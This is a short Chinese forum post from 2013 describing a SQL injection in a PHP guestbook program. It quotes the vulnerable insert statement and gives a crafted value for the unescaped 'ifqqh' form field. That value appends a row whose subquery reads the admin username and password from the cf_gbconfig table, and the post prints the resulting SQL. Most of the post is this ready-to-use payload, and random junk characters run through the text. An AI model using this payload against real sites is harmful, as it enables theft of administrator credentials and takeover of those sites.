留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。7 b: a2 S2 M8 }( Y* t; H+ ~
# W" i9 b3 S' ?! L" M& [7 H# N+ E4 T* I$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
- Y, |0 P* l2 ~4 g2 o# f. Z2 Q% y7 j$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响" j7 R* J* c F+ h
! H6 V" s% d: Y O2 X2 o提交的时候把ifqqh的值改一下。变成
2 J2 p0 ^" Z$ m& `" R+ ?2 J; m/ _ B8 R% t" ?4 I4 R9 i& k
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
O5 w i$ |) t* \, b/ W$ H/ e$ A! u& U* p8 F
这样SQL插入语句就变了.6 M1 n( z. h) b* I
0 U7 l- w) o, V. n$ L" }+ z' ?
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
! D3 D8 L8 e. U5 R5 M' E4 S9 ^
# Q/ Q- i; a/ b0 u9 [构造了另外一句SQL。并且把帐号密码读出来。/ @1 l7 z* ?$ |6 Y& @: B
& T* A2 ?) b' T% m |
发表于 2013-2-19 08:10:11
收藏
支持
反对